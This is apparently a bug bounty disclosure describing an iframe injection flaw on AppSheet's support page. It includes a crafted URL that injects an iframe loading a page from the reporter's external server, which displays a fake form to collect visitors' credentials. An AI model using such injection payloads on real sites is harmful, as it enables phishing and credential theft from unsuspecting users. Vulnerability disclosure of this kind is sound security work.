Summary:
Onsite Iframe injection at Customer support page leads to harvest user problems & credentials
Product:
Appsheet
URL:
https://www.appsheet.com/Support
Vulnerability type:
Other
Details
Hi, Team this vulnerability was found in Appsheet which is the acquisition of Google, Acquired on Jan 15, 2020
Vulnerability
: Onsite Iframe injection at Customer support page leads to harvest user problems & credentials
Description
:  An iFrame injection is a very common cross-site scripting (or XSS) attack. It consists of one or more iFrame tags that have been inserted into a page or post’s content and typically downloads an executable program or conducts other actions that compromise the site visitors’ computers. In the best case, Google may label the site “malicious.” The worst case is that the site owner and visitors end up with malware-infected computers.
frame injection, which occurs when a frame on a vulnerable web page displays another web page via a user-controllable input.
Steps to Reproduce
:
I Have hosted a malicious code in my server i.e
https://www.basubanakar.com/con.html
Now By using html injection vulnerability on Appsheet main domain i.e on customer support page , I will call my malicious code using html injection or iframe injection. ex:  Here vulnerable parameter is "dFR[doc_type][0]=" Now as an attacker I will craft that url as:
https://www.appsheet.com/Support?q=%20&dFR[doc_type][0]=%3Ciframe%20src=%22https://www.basubanakar.com/con.html%22%20width=1200%20height=1000%20/%3E
Now when victim opens this links I am getting his creds etc by using form.
Proof of concept
:  See this Below video
https://drive.google.com/file/d/1xNCq3yxVkzhm4MKzg0_yFtYcSO4XVWZl/view?usp=sharing
Attack scenario
Any attacker can exploit this vulnerability because its present mainly on Customer support page
where he can inject his own contact form and he can harvest victim creds by that.